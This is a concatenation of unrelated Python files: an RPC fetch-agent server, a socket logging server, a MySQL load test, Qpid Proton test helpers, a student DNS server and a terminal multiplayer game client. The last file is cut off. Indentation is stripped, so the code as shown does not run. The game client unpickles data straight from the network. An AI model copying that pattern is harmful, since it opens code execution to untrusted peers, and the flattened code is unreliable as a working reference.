try:
ret = self.mdict['feed_inq'][feed_q_name].get_nowait()
return ret
except queue.Empty:
return None
def checkOk(self):
return (True, b'wattt\0')
sock_path = '/tmp/rwp-fetchagent-sock'
def run_rpc(interface_dict):
print("MpRPC server Started.")
server_instance = FetchInterfaceClass(interface_dict, "MpRPC")
mprpc_server = StreamServer(('0.0.0.0', 4315), server_instance)
gevent.signal(signal.SIGINT, build_mprpc_handler(mprpc_server))
mprpc_server.serve_forever()
def initialize_manager(interface_dict):
# interface_dict.qlock = pickle.dumps(mgr.Lock())
interface_dict['qlock'] = threading.Lock()
print("Manager lock: ", interface_dict['qlock'])
interface_dict['outq'] = {}
interface_dict['inq'] = {}
interface_dict['feed_outq'] = {}
interface_dict['feed_inq'] = {}
def run():
interface_dict = {}
logSetup.initLogging()
# Make sure the socket does not already exist
try:
os.unlink(sock_path)
except OSError:
if os.path.exists(sock_path):
raise
initialize_manager(interface_dict)
amqp_interface = FetchAgent.MessageProcessor.MessageProcessor(interface_dict)
print("AMQP Interfaces have started. Launching RPC threads.")
t2 = threading.Thread(target=run_rpc, args=(interface_dict, ))
t2.start()
try:
while INTERRUPTS == 0:
amqp_interface.run()
time.sleep(0.1)
except AssertionError:
print("Main worker encountered assertion failure!")
traceback.print_exc()
base_abort()
except KeyboardInterrupt:
print("Main worker abort")
base_abort()
except Exception:
print("Wat?")
traceback.print_exc()
with open("Manager error %s.txt" % time.time(), "w") as fp:
fp.write("Manager crashed?\n")
fp.write(traceback.format_exc())
print("Joining on worker threads")
t2.join(timeout=60)
print("Terminating AMQP interface.")
amqp_interface.terminate()
def main():
print("Preloading cache directories")
# print("Testing reload")
# server.tree.tree.reloadTree()
# print("Starting RPC server")
try:
run()
except:
# abort /hard/ if we exceptioned out of the main run.
        # This should (hopefully) cause the OS to terminate any
# remaining threads.
# As it is, I've been having issues with the main thread failing
# with 'OSError: [Errno 24] Too many open files', killing the main thread
# and leaving some of the amqp interface threads dangling.
# Somehow, it's not being caught in the `except Exception:` handler
# in run(). NFI how.
import ctypes
ctypes.string_at(0)
if __name__ == '__main__':
main()
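# --- Illustrative sketch (editor's addition, not part of this server) ---
# FetchInterfaceClass above is served with mprpc over a gevent StreamServer on
# port 4315, so another process can push and pull jobs with an ordinary mprpc
# client. A minimal sketch, assuming the standard mprpc RPCClient API; the host,
# queue name and payload are placeholders:
from mprpc import RPCClient

def fetch_agent_roundtrip():
    client = RPCClient('127.0.0.1', 4315)
    ok, marker = client.call('checkOk')           # server replies (True, b'wattt\x00')
    client.call('putJob', 'example_queue', b'serialized job payload')
    job = client.call('getJob', 'example_queue')  # None until a response is queued in 'inq'
    return ok, job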
|
server.py
|
"""Logging Server for multiprocessing logging managements.
Basic usage:
>>> import logging, sys
>>> ls = LoggingServer()
>>> sh = logging.StreamHandler(sys.stdout)
>>> ls.logger.addHandler(sh)
>>> ls.start() # run server in other thread.
>>> # your process
...
>>> # end process
>>> # Server thread is a daemon, so you don't need to call `ls.shutdown()`
>>> ls.shutdown() # If you need. `del ls` is same.
You can use any server address
>>> ls = LoggingServer(host="127.0.0.1", port=9999)
"""
from .handlers import LogRecordStreamHandler
import socketserver
import logging
import logging.handlers
import threading
from typing import *
class LoggingServer(socketserver.ThreadingTCPServer):
"""The SocketServer which receive Logs."""
allow_reuse_address = True
daemon_threads = True
def __init__(self,host='localhost',port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler, logger_name:str=__name__):
super().__init__((host, port), handler)
self.timeout = 1
self.logname = logger_name
self.logger = logging.getLogger(logger_name)
self.__shutdown = True
self.server_thread:threading.Thread = None
def serve_until_stopped(self):
import select
while not self.__shutdown:
rd, wr, ex = select.select([self.socket.fileno()], [], [], self.timeout)
if rd:
self.handle_request()
self.logger.info("Logging Server stopped.")
def start(self):
"""Starts serve_until_stopped roop as a daemon thread."""
self.__shutdown= False
self.server_thread = threading.Thread(target=self.serve_until_stopped,daemon=True)
self.server_thread.start()
self.logger.info("About starting Logging Server...")
def shutdown(self):
"""Stops serve_until_stopped roop."""
self.__shutdown = True
self.logger.info("Shutdown Logging Server...")
@property
def is_shutdown(self) -> bool:
return self.__shutdown
def __enter__(self):
"""Starts server."""
self.start()
def __exit__(self, exc_type,exc_val,exc_tb) -> None:
"""Shutdown server"""
self.shutdown()
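# --- Illustrative sketch (editor's addition, not part of this module) ---
# Worker processes send LogRecords to the LoggingServer above using the standard
# library SocketHandler; the server's LogRecordStreamHandler (imported from
# .handlers) unpickles each record and re-emits it through the server's logger.
# A minimal client-side sketch, assuming only the standard library:
import logging
import logging.handlers

def configure_worker_logging(host: str = "localhost",
                             port: int = logging.handlers.DEFAULT_TCP_LOGGING_PORT) -> logging.Logger:
    """Attach a SocketHandler so this process's records reach the LoggingServer."""
    logger = logging.getLogger("worker")
    logger.setLevel(logging.DEBUG)
    logger.addHandler(logging.handlers.SocketHandler(host, port))
    return logger

# Typical use in a worker process:
# logger = configure_worker_logging()
# logger.info("hello from a worker process")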
|
pymysql_9_conn_test.py
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
from pymysql_comm import UsingMysql
import threading
from random import randint
# Simulate a user action: each simulated user opens a connection and reads one row
def mock_user_action(name):
    log_label = '%s queried the database' % name
    with UsingMysql(log_time=False) as um:
        um.cursor.execute("select * from Product limit 1")
        data = um.cursor.fetchone()
        if not data:
            print('-- no data (%s)' % log_label)
            return
def check_access():
    user_count = 100000 # number of simulated users
    # simulate many users hitting the product table concurrently
    for i in range(0, user_count):
        user_name = 'user-%d' % i
thread = threading.Thread(target=mock_user_action, args=(user_name,))
thread.start()
if __name__ == '__main__':
check_access()
|
common.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from random import randint
from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
from subprocess import Popen,PIPE,STDOUT
import sys, os, string
from proton import Driver, Connection, Transport, SASL, Endpoint, Delivery, \
SSLDomain, SSLUnavailable
def free_tcp_ports(count=1):
""" return a list of 'count' TCP ports that are free to used (ie. unbound)
"""
retry = 0
ports = []
sockets = []
while len(ports) != count:
port = randint(49152, 65535)
sockets.append( socket( AF_INET, SOCK_STREAM ) )
try:
sockets[-1].bind( ("0.0.0.0", port ) )
ports.append( port )
retry = 0
except:
retry += 1
assert retry != 100, "No free sockets available for test!"
for s in sockets:
s.close()
return ports
def pump_uni(src, dst, buffer_size=1024):
p = src.pending()
c = dst.capacity()
if c < 0:
if p < 0:
return False
else:
src.close_head()
return True
if p < 0:
dst.close_tail()
elif p == 0 or c == 0:
return False
else:
bytes = src.peek(min(c, buffer_size))
dst.push(bytes)
src.pop(len(bytes))
return True
def pump(transport1, transport2, buffer_size=1024):
""" Transfer all pending bytes between two Proton engines
by repeatedly calling peek/pop and push.
Asserts that each engine accepts some bytes every time
(unless it's already closed).
"""
while (pump_uni(transport1, transport2, buffer_size) or
pump_uni(transport2, transport1, buffer_size)):
pass
def isSSLPresent():
""" True if a suitable SSL library is available.
"""
try:
xxx = SSLDomain(SSLDomain.MODE_SERVER)
return True
except SSLUnavailable, e:
# SSL libraries not installed
return False
class Test(object):
def __init__(self, name):
self.name = name
def configure(self, config):
self.config = config
def default(self, name, value, **profiles):
default = value
profile = self.config.defines.get("profile")
if profile:
default = profiles.get(profile, default)
return self.config.defines.get(name, default)
@property
def delay(self):
return float(self.default("delay", "1", fast="0.1"))
@property
def timeout(self):
return float(self.default("timeout", "60", fast="10"))
@property
def verbose(self):
return int(self.default("verbose", 0))
class Skipped(Exception):
skipped = True
class TestServer(object):
""" Base class for creating test-specific message servers.
"""
def __init__(self, **kwargs):
self.args = kwargs
self.driver = Driver()
self.host = "127.0.0.1"
self.port = 0
if "host" in kwargs:
self.host = kwargs["host"]
if "port" in kwargs:
self.port = kwargs["port"]
self.driver_timeout = -1
self.credit_batch = 10
self.thread = Thread(name="server-thread", target=self.run)
self.thread.daemon = True
self.running = True
def start(self):
retry = 0
if self.port == 0:
self.port = str(randint(49152, 65535))
retry = 10
self.listener = self.driver.listener(self.host, self.port)
while not self.listener and retry > 0:
retry -= 1
self.port = str(randint(49152, 65535))
self.listener = self.driver.listener(self.host, self.port)
assert self.listener, "No free port for server to listen on!"
self.thread.start()
def stop(self):
self.running = False
self.driver.wakeup()
self.thread.join()
if self.listener:
self.listener.close()
cxtr = self.driver.head_connector()
while cxtr:
if not cxtr.closed:
cxtr.close()
cxtr = cxtr.next()
# Note: all following methods all run under the thread:
def run(self):
while self.running:
self.driver.wait(self.driver_timeout)
self.process_listeners()
self.process_connectors()
def process_listeners(self):
""" Service each pending listener
"""
l = self.driver.pending_listener()
while l:
cxtr = l.accept()
assert(cxtr)
self.init_connector(cxtr)
l = self.driver.pending_listener()
def init_connector(self, cxtr):
""" Initialize a newly accepted connector
"""
sasl = cxtr.sasl()
sasl.mechanisms("ANONYMOUS")
sasl.server()
cxtr.connection = Connection()
if "idle_timeout" in self.args:
cxtr.transport.idle_timeout = self.args["idle_timeout"]
def process_connectors(self):
""" Service each pending connector
"""
cxtr = self.driver.pending_connector()
while cxtr:
self.process_connector(cxtr)
cxtr = self.driver.pending_connector()
def process_connector(self, cxtr):
""" Process a pending connector
"""
if not cxtr.closed:
cxtr.process()
sasl = cxtr.sasl()
if sasl.state != SASL.STATE_PASS:
self.authenticate_connector(cxtr)
else:
conn = cxtr.connection
if conn:
self.service_connection(conn)
cxtr.process()
def authenticate_connector(self, cxtr):
""" Deal with a connector that has not passed SASL
"""
# by default, just permit anyone
sasl = cxtr.sasl()
if sasl.state == SASL.STATE_STEP:
sasl.done(SASL.OK)
def service_connection(self, conn):
""" Process a Connection
"""
if conn.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT:
conn.open()
# open all pending sessions
ssn = conn.session_head(Endpoint.LOCAL_UNINIT)
while ssn:
self.init_session(ssn)
ssn.open()
ssn = ssn.next(Endpoint.LOCAL_UNINIT)
# configure and open any pending links
link = conn.link_head(Endpoint.LOCAL_UNINIT)
while link:
self.init_link(link)
link.open()
link = link.next(Endpoint.LOCAL_UNINIT);
## Step 2: Now drain all the pending deliveries from the connection's
## work queue and process them
delivery = conn.work_head
while delivery:
self.process_delivery(delivery)
delivery = conn.work_head
## Step 3: Clean up any links or sessions that have been closed by the
## remote. If the connection has been closed remotely, clean that up
## also.
# teardown any terminating links
link = conn.link_head(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
while link:
link.close()
link = link.next(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
# teardown any terminating sessions
ssn = conn.session_head(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
while ssn:
            ssn.close()
ssn = ssn.next(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
if conn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED:
conn.close()
def init_session(self, ssn):
""" Test-specific Session initialization
"""
pass
def init_link(self, link):
""" Test-specific Link initialization
"""
pass
def process_delivery(self, delivery):
""" Test-specific Delivery processing.
"""
pass
class TestServerDrain(TestServer):
""" A primitive test server that accepts connections and simply discards any
messages sent to it.
"""
def __init__(self, **kwargs):
TestServer.__init__(self, **kwargs)
def init_link(self, link):
""" Test-specific Link initialization
"""
if link.is_receiver:
link.flow(self.credit_batch)
def process_delivery(self, delivery):
""" Just drop any incomming messages
"""
link = delivery.link
if delivery.readable: # inbound data available
m = link.recv(1024)
while m:
#print("Dropping msg...%s" % str(m))
m = link.recv(1024)
delivery.update(Delivery.ACCEPTED)
delivery.settle()
else:
link.advance()
if link.credit == 0:
link.flow(self.credit_batch)
#
# Classes that wrap the messenger applications msgr-send and msgr-recv.
# These applications reside in the tests/tools/apps directory
#
class MessengerApp(object):
""" Interface to control a MessengerApp """
def __init__(self):
self._cmdline = None
# options common to Receivers and Senders:
self.ca_db = None
self.certificate = None
self.privatekey = None
self.password = None
self._output = None
def findfile(self, filename, searchpath):
"""Find filename in the searchpath
return absolute path to the file or None
"""
paths = string.split(searchpath, os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, filename)):
return os.path.abspath(os.path.join(path, filename))
return None
def start(self, verbose=False):
""" Begin executing the test """
cmd = self.cmdline()
self._verbose = verbose
if self._verbose:
print("COMMAND='%s'" % str(cmd))
#print("ENV='%s'" % str(os.environ.copy()))
try:
if os.name=="nt":
# Windows handles python launch by replacing script 'filename' with
# 'python abspath-to-filename' in cmdline arg list.
if cmd[0].endswith('.py'):
foundfile = self.findfile(cmd[0], os.environ['PATH'])
if foundfile is None:
foundfile = self.findfile(cmd[0], os.environ['PYTHONPATH'])
assert foundfile is not None, "Unable to locate file '%s' in PATH or PYTHONPATH" % cmd[0]
del cmd[0:1]
cmd.insert(0, foundfile)
cmd.insert(0, sys.executable)
self._process = Popen(cmd, stdout=PIPE, stderr=STDOUT, bufsize=4096)
except OSError, e:
print("ERROR: '%s'" % e)
assert False, "Unable to execute command '%s', is it in your PATH?" % cmd[0]
self._ready() # wait for it to initialize
def stop(self):
""" Signal the client to start clean shutdown """
pass
def wait(self):
""" Wait for client to complete """
self._output = self._process.communicate()
if self._verbose:
print("OUTPUT='%s'" % self.stdout())
def status(self):
""" Return status from client process """
return self._process.returncode
def stdout(self):
#self._process.communicate()[0]
if not self._output or not self._output[0]:
return "*** NO STDOUT ***"
return self._output[0]
def stderr(self):
if not self._output or not self._output[1]:
return "*** NO STDERR ***"
return self._output[1]
def cmdline(self):
if not self._cmdline:
self._build_command()
return self._cmdline
def _build_command(self):
assert False, "_build_command() needs override"
def _ready(self):
assert False, "_ready() needs override"
def _do_common_options(self):
""" Common option handling """
if self.ca_db is not None:
self._cmdline.append("-T")
self._cmdline.append(str(self.ca_db))
if self.certificate is not None:
self._cmdline.append("-C")
self._cmdline.append(str(self.certificate))
if self.privatekey is not None:
self._cmdline.append("-K")
self._cmdline.append(str(self.privatekey))
if self.password is not None:
self._cmdline.append("-P")
self._cmdline.append("pass:" + str(self.password))
class MessengerSender(MessengerApp):
""" Interface to configure a sending MessengerApp """
def __init__(self):
MessengerApp.__init__(self)
self._command = None
# @todo make these properties
self.targets = []
self.send_count = None
self.msg_size = None
self.send_batch = None
self.outgoing_window = None
self.report_interval = None
self.get_reply = False
self.timeout = None
self.incoming_window = None
self.recv_count = None
self.name = None
# command string?
def _build_command(self):
self._cmdline = self._command
self._do_common_options()
assert self.targets, "Missing targets, required for sender!"
self._cmdline.append("-a")
self._cmdline.append(",".join(self.targets))
if self.send_count is not None:
self._cmdline.append("-c")
self._cmdline.append(str(self.send_count))
if self.msg_size is not None:
self._cmdline.append("-b")
self._cmdline.append(str(self.msg_size))
if self.send_batch is not None:
self._cmdline.append("-p")
self._cmdline.append(str(self.send_batch))
if self.outgoing_window is not None:
self._cmdline.append("-w")
self._cmdline.append(str(self.outgoing_window))
if self.report_interval is not None:
self._cmdline.append("-e")
self._cmdline.append(str(self.report_interval))
if self.get_reply:
self._cmdline.append("-R")
if self.timeout is not None:
self._cmdline.append("-t")
self._cmdline.append(str(self.timeout))
if self.incoming_window is not None:
self._cmdline.append("-W")
self._cmdline.append(str(self.incoming_window))
if self.recv_count is not None:
self._cmdline.append("-B")
self._cmdline.append(str(self.recv_count))
if self.name is not None:
self._cmdline.append("-N")
self._cmdline.append(str(self.name))
def _ready(self):
pass
class MessengerReceiver(MessengerApp):
""" Interface to configure a receiving MessengerApp """
def __init__(self):
MessengerApp.__init__(self)
self._command = None
# @todo make these properties
self.subscriptions = []
self.receive_count = None
self.recv_count = None
self.incoming_window = None
self.timeout = None
self.report_interval = None
self.send_reply = False
self.outgoing_window = None
self.forwards = []
self.name = None
# command string?
def _build_command(self):
self._cmdline = self._command
self._do_common_options()
self._cmdline += ["-X", "READY"]
assert self.subscriptions, "Missing subscriptions, required for receiver!"
self._cmdline.append("-a")
self._cmdline.append(",".join(self.subscriptions))
if self.receive_count is not None:
self._cmdline.append("-c")
self._cmdline.append(str(self.receive_count))
if self.recv_count is not None:
self._cmdline.append("-b")
self._cmdline.append(str(self.recv_count))
if self.incoming_window is not None:
self._cmdline.append("-w")
self._cmdline.append(str(self.incoming_window))
if self.timeout is not None:
self._cmdline.append("-t")
self._cmdline.append(str(self.timeout))
if self.report_interval is not None:
self._cmdline.append("-e")
self._cmdline.append(str(self.report_interval))
if self.send_reply:
self._cmdline.append("-R")
if self.outgoing_window is not None:
self._cmdline.append("-W")
self._cmdline.append(str(self.outgoing_window))
if self.forwards:
self._cmdline.append("-F")
self._cmdline.append(",".join(self.forwards))
if self.name is not None:
self._cmdline.append("-N")
self._cmdline.append(str(self.name))
def _ready(self):
""" wait for subscriptions to complete setup. """
r = self._process.stdout.readline()
assert r == "READY" + os.linesep, "Unexpected input while waiting for receiver to initialize: %s" % r
class MessengerSenderC(MessengerSender):
def __init__(self):
MessengerSender.__init__(self)
self._command = ["msgr-send"]
class MessengerSenderValgrind(MessengerSenderC):
""" Run the C sender under Valgrind
"""
def __init__(self, suppressions=None):
if "VALGRIND" not in os.environ:
raise Skipped("Skipping test - $VALGRIND not set.")
MessengerSenderC.__init__(self)
if not suppressions:
suppressions = os.path.join(os.path.dirname(__file__),
"valgrind.supp" )
self._command = [os.environ["VALGRIND"], "--error-exitcode=1", "--quiet",
"--trace-children=yes", "--leak-check=full",
"--suppressions=%s" % suppressions] + self._command
class MessengerReceiverC(MessengerReceiver):
def __init__(self):
MessengerReceiver.__init__(self)
self._command = ["msgr-recv"]
class MessengerReceiverValgrind(MessengerReceiverC):
""" Run the C receiver under Valgrind
"""
def __init__(self, suppressions=None):
if "VALGRIND" not in os.environ:
raise Skipped("Skipping test - $VALGRIND not set.")
MessengerReceiverC.__init__(self)
if not suppressions:
suppressions = os.path.join(os.path.dirname(__file__),
"valgrind.supp" )
self._command = [os.environ["VALGRIND"], "--error-exitcode=1", "--quiet",
"--trace-children=yes", "--leak-check=full",
"--suppressions=%s" % suppressions] + self._command
class MessengerSenderPython(MessengerSender):
def __init__(self):
MessengerSender.__init__(self)
self._command = ["msgr-send.py"]
class MessengerReceiverPython(MessengerReceiver):
def __init__(self):
MessengerReceiver.__init__(self)
self._command = ["msgr-recv.py"]
|
ts.py
|
# Anthony Tiongson (ast119) with assistance from Nicolas Gundersen (neg62)
# TS (a simplified top-level DNS server)
# resources:
# https://www.pythonforbeginners.com/system/python-sys-argv
import sys, threading, time, random, socket
def server():
# Establish port via command-line argument
port = int(sys.argv[1])
# Create file object to read TS DNS table
TSFile = open("PROJI-DNSTS.txt", "r")
# Initialize dictionary for DNS table
DNSTable = {}
# Store TS DNS table in dictionary
for line in TSFile:
hostname, IPaddress, flag = line.split()
hostname = hostname.lower()
DNSTable[hostname] = hostname + " " + IPaddress + " " + flag
print("Creating DNS dictionary: " + str(DNSTable) + "\n")
try:
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("TS server socket created: port " + str(port) + "\n")
except socket.error as socketError:
        print('TS server socket could not be created, error: {}\n'.format(socketError))
exit()
serverBinding = ('', port)
serverSocket.bind(serverBinding)
serverSocket.listen(1)
TSHostname = socket.gethostname()
print("TS server hostname: {}".format(TSHostname))
localhostIP = (socket.gethostbyname(TSHostname))
print("TS server IP address: {}".format(localhostIP))
while True:
clientSocketID, address = serverSocket.accept()
print("Received client connection request from: {}".format(address))
# Server greeting message to client
greeting = "Welcome to CS 352 TS server! Socket to me!"
clientSocketID.send(greeting.encode('utf-8'))
# Receive hostname query from the client
        queryFromClient = clientSocketID.recv(256).decode('utf-8')
# The client is done querying
if queryFromClient == "shutdownTSServer":
print("Received shutdown command...")
clientSocketID.close()
break
# If hostname is in dictionary, send hostname information
elif queryFromClient in DNSTable:
clientSocketID.send(str(DNSTable[queryFromClient]).encode('utf-8'))
# Hostname not in dictionary, send error message
else:
            clientSocketID.send((queryFromClient + " - Error:HOST NOT FOUND").encode('utf-8'))
# Close the client socket connection
print("\nClosing socket connection.\n")
clientSocketID.close()
# Close the server socket and shutdown server
serverSocket.close()
exit()
if __name__ == "__main__":
thread = threading.Thread(name='server', target = server)
thread.start()
sleepTime = random.random() * 5
print("\nTS server thread executed, sleep time: " + str(sleepTime) + " sec\n")
time.sleep(sleepTime)
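# --- Illustrative sketch (editor's addition, not part of ts.py) ---
# A minimal client for the TS protocol above: connect, read the greeting, send one
# lowercase hostname query, and read the reply ("hostname IPaddress flag" on a hit,
# "<query> - Error:HOST NOT FOUND" on a miss). The port below is a placeholder; the
# real server takes its port from sys.argv[1].
import socket

def query_ts(hostname, server_host="localhost", server_port=50007):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((server_host, server_port))
        print(s.recv(256).decode("utf-8"))           # server greeting
        s.sendall(hostname.lower().encode("utf-8"))  # one query per connection
        return s.recv(256).decode("utf-8")

# Example:
# print(query_ts("cs.rutgers.edu"))
# query_ts("shutdownTSServer")   # asks the server loop to exit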
|
mmorpgClient.py
|
import socket, pickle,time,os,threading,msvcrt,sys,random
import Action, basicBullet, Map, chatListUsers
createBullet = basicBullet.BasicBullet
createAction = Action.Action
# server settings
IP_server='localhost'
porta_server=12397
ACTION_DICTIONARY = {"a":"walk","w":"walk","s":"walk","d":"walk"," ":"shot","l":"reborn","r":"reload","i":"chat"}
socket_cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# a = (20,20)
# map = numpy.chararray(a)
isRunning=True
isDrawing=True
mapSize=1002
jLimit=58
j=jLimit
class User(object):
def __init__(self,position,style,alive,login):
self.p=position
self.lastPosition=[position-1]
self.style=style
self.login=login
self.alive=alive
self.kills=0
self.deaths=0
def filterKeys(key):
if(key=="a"):
return True
elif(key=="d"):
return True
elif(key=="s"):
return True
elif(key=="w"):
return True
elif(key==" "):
return True
elif(key=="p"):
return True
elif(key=="r"):
return True
elif(key=="l"):
return True
elif(key=="i"):
return True
else:
return False
map = Map.createMap()
# map = createMap()
def cleanMap(position,map):
map[position]=" "
return map
def killerAnimation(killer,dead):
i = random.randrange(4)
painel = []
theString1 = killer +" just Killed "+dead+" with a kind of, i don't know, a gun."
painel.append(theString1)
theString2 = killer +" matou o "+dead+" de forma implacável. e está imparável!"
painel.append(theString2)
painel.append(killer+" matou o "+dead+". A galera enlouqueceu!")
painel.append(killer+" killed "+dead+". But don't fell like you're the coolest kid in the place or what ever!")
return painel[i]
def painelCreate():
i = random.randrange(3)
painel=[]
painel.append(" Ubisoft Apresenta o game que a garotada toda estava esperando, direto do parque da xuxa")
painel.append(" Ofecimento Skol, a única que desce redondo. Volkswagen, você conhece, você confia!. Coca-Cola, Sinta o Sabor!")
painel.append(" Creditos Marcio Perdigão e Yagolicia")
return painel[i]
currentStringPainel=""
def animationThread():
while isRunning:
time.sleep(2)
global currentStringPainel
currentStringPainel = painelCreate()
while isRunning:
time.sleep(0.2)
# print(len(currentStringPainel))
# print(currentStringPainel)
if(len(currentStringPainel)==1): break
currentStringPainel = currentStringPainel[1:]
animationT = threading.Thread(target=animationThread)
animationT.start()
listUsers = []
listBullets = []
chatList = []
linha = int(mapSize/jLimit)
def startDrawing():
print ("Digite (W) para subir, (D) para ir à direita\n"
+"(S) para descer, (A) para ir à esquerda\n"
+"(Space) para atirar e(I) para abrir o chat")
fps=100/1000
while True:
while isDrawing:
map = Map.createMap()
print(currentStringPainel)
for bullet in listBullets:
# print(bullet)
map[bullet.position]="*"
# print(len(listUsers))
for user in listUsers:
if(user.alive):
print(" login: "+user.login+": kills: "+str(user.kills)+" deaths: "+str(user.deaths)+" foto: "+user.style)
map[user.p]=user.style
else:
if(l==user.login):
print("Press (L) to reborn, or just watch the game like a loooooosseeerrr!")
# map = cleanMap(personagem.p,map)
j=0
for i in range(mapSize+1):
if(j==jLimit):
j=0
theEnd='\n'
theFlush=False
else:
j=j+1
theEnd=" "
theFlush=True
# print(position)
# map[personagem.p]=personagem.style
print(map[i],end=theEnd,flush=theFlush)
print("FPS: "+str(fps))
for c in chatList:
print(" "+c.login+"\> "+c.msg)
time.sleep(fps)
os.system('cls')
time.sleep(1)
def sendMessage():
global isRunning
global isDrawing
global l
global p
while True:
a = msvcrt.getch()
# print(a)
if(str(a)==str(b'\xe0')):
# print("VALOR INVALIDO")
continue
if(filterKeys(a.decode("utf-8"))!=True):
# print("VALOR INVALIDO")
continue
if(a.decode("utf-8")=="p"):
print(a)
isRunning=False
isDrawing=False
sys.exit()
m = a.decode("utf-8")
if(a.decode("utf-8")=="i"):
isDrawing=False
time.sleep(0.5)
m = input("Digite a mensagem: ")
isDrawing=True
mSend = (ACTION_DICTIONARY[a.decode("utf-8")],((l,m),l,p,""))
byte = pickle.dumps(mSend)
socket_cliente.send(byte)
time.sleep(0.1)
def receive():
global isRunning
global isDrawing
global l
global p
global listActions
while True:
rec = socket_cliente.recv(1024)
if(isRunning):
# print(rec)
action,msg = pickle.loads(rec)
# print(action,msg)
for act in listActions:
# print(act.actionName,action)
if(act.actionName==action):
act.funAction(msg)
else:
mSend = ("disconnect",((l,p),l,p,""))
byte = pickle.dumps(mSend)
socket_cliente.send(byte)
socket_cliente.close()
sys.exit()
def chat(msg):
l,m = msg
global chatList
# print("chat")
for user in listUsers:
if(user.login==l):
if(len(chatList)>7):
chatList.pop(0)
c = chatListUsers.chat(l,m)
chatList.append(c)
def reborn(login):
global listUsers
# print("User is Reborn")
for index in range(len(listUsers)):
try:
if(index>len(listUsers)): break
if(listUsers[index].login==login):
listUsers[index].alive=True
# listUsers.pop(index)
except Exception as error:
print("")
def userDead(users):
global listUsers
global currentStringPainel
# print("User is Dead")
killer,kKills,kDeaths,dead,dKills,dDeaths = users
currentStringPainel = killerAnimation(killer,dead)
for index in range(len(listUsers)):
try:
if(index>len(listUsers)): break
if(listUsers[index].login==dead):
listUsers[index].alive=False
listUsers[index].kills=dKills
listUsers[index].deaths=dDeaths
if(listUsers[index].login==killer):
listUsers[index].kills=kKills
listUsers[index].deaths=kDeaths
# listUsers.pop(index)
except Exception as error:
print("")
def delBullet(bID):
global listBullets
# print(len(listBullets))
for index in range(len(listBullets)):
try:
if(index>len(listBullets)): break
if(listBullets[index].id==bID):
listBullets.pop(index)
except Exception as error:
print("")
def newBullet(bullet):
global listBullets
position,id = bullet
b = createBullet(position,id)
listBullets.append(b)
def receiverNewUser(users):
global listUsers
listUsers=[]
for user in users:
# print("New user "+user._login,user._p,user._style)
personagem = User(user._p,user._style,user._alive,user._login)
listUsers.append(personagem)
def receiverUpdateMap(msg):
users,bullets = msg
for b in bullets:
position,id = b
for bullet in listBullets:
# print("b.id :",b)
# print("bullet update: "+bullet.id)
if(bullet.id==id):
bullet.position=position
for u in users:
position,login = u
for clientUser in listUsers:
# print("update login: "+clientUser.login)
if(clientUser.login==login):
# for p in clientUser.lastPosition:
# if(p!=position):
# clientUser.lastPosition.append(clientUser.p)
clientUser.login = login
clientUser.p = position
listActions=[]
newUserAction = createAction("newUser",receiverNewUser)
listActions.append(newUserAction)
userDeadAction = createAction("userDead",userDead)
listActions.append(userDeadAction)
userRebornAction = createAction("reborn",reborn)
listActions.append(userRebornAction)
updateMapAction = createAction("updateMap",receiverUpdateMap)
listActions.append(updateMapAction)
newBulletAction = createAction("newBullet",newBullet)
listActions.append(newBulletAction)
delBulletAction = createAction("delBullet",delBullet)
listActions.append(delBulletAction)
chatAction = createAction("chat",chat)
listActions.append(chatAction)
# socket_cliente.bind((IP,porta))
try:
print("MMORPG, ESSE É O NOME, É O QUE TÁ ESCRITO!")
l = input("Login: ")
p = input("Senha: ")
while True:
s = input("Digite uma letra para ser seu style: ")
if(s=="|"):
print("Este não é um estilo valido.")
elif(s=="*"):
print("Este não é um estilo valido.")
elif(s=="="):
print("Este não é um estilo valido.")
elif(s=="X"):
print("Este não é um estilo valido.")
else:
break
# IP_server = input("Entre com o endereço de IP do servidor: ")
MSG= ("on",("logando",l,p,s))
byte = pickle.dumps(MSG)
socket_cliente.connect((IP_server,porta_server))
thread_send = threading.Thread(target=sendMessage)
thread_send.start()
thread_receive = threading.Thread(target=receive)
thread_receive.start()
socket_cliente.send(byte)
startDrawing()
# rec=socket_cliente.recv(1024)
# print(rec)
except Exception as error:
print(str(error))
print("Algum erro foi gerado e sei lá! Ignore e provavelmente o erro suma com o tempo")
socket_cliente.close()
isRunning=False
isDrawing=False
sys.exit()
|
Test_reconstruction_queues.py
|
from __future__ import division
from misc_scripts.r_factor_calc import *
from iotbx.pdb.multimer_reconstruction import multimer
from multiprocessing import Process, Queue, Lock
from iotbx import pdb
import cPickle as pickle
import os
'''
Read a list of pdb file names with more than one good BIOMT record
Read a list of pdb file names with more than one good MTRIX record
Get corresponding structure factor files
@author: Youval Dar
'''
def Call_function(queue,lock):
'''
Collect the results from the parallel process and write them into files
Collect_tested_files : the file that lists all pdb files that were checked
    files_with_problems : the file listing all pdb files that had processing issues or r>=1
results are stored in files in the following format:
file_name1:r1:msg1
file_name2:r2:msg2
file_name3:r3:msg3
.
.
the r is the result of r_factor_calc.py
msg is the error or problem with the test, if there is one
'''
# append results from this run
f = open('/net/cci-filer2/raid1/home/youval/Work/work/Collect_tested_files','a')
g = open('/net/cci-filer2/raid1/home/youval/Work/work/files_with_problems','a')
while True:
# get items from the queue
x = queue.get()
# check if queue is empty
if x == 'DONE':
